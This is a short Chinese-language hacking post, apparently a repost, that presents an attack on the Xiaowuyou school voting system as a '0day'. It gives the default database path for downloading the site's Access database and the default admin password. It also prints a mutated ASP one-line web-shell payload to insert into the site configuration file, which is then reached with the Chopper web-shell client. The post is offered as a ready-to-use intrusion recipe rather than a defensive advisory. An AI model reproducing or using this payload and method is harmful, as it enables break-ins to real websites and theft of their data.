校无忧投票系统利用0day(数据库下载+拿shell) - 网

以前的： 校无忧学校网站系统1.0 漏洞及修复 其实呢，也算不上一个0day.只是一个思路罢了，最近无聊。无视上A5看了下，发现一个投票系统，粗略的看了下，用的人也挺多，于是就下下来，研究研究，本机搭建看了下，代码基本没什么 漏洞 ，（可能是我技术不好吧，）于是转站，发现数据库，上网转了圈，基本上都可以 下载 数据库 ，   后台拿shell的方法呢，   在网站配置的地方插入一句话，这个普通的一句话是不能用的要用变异的一句话，插入，测试成功   一句话：  1     "%><%execute(request("xiaoma"))%><%' 嘿嘿，这个是变异的，普通的不能用哦 默认帐号密码：admin 这个通杀率很高，实在不行我们可一下载数据库 数据库地址：data/xiao5u.mdb 插入一句话以后。菜刀连接   www. 2cto .com /inc/config. asp

查看更多关于校无忧投票系统利用0day(数据库下载+拿shell) - 网的详细内容...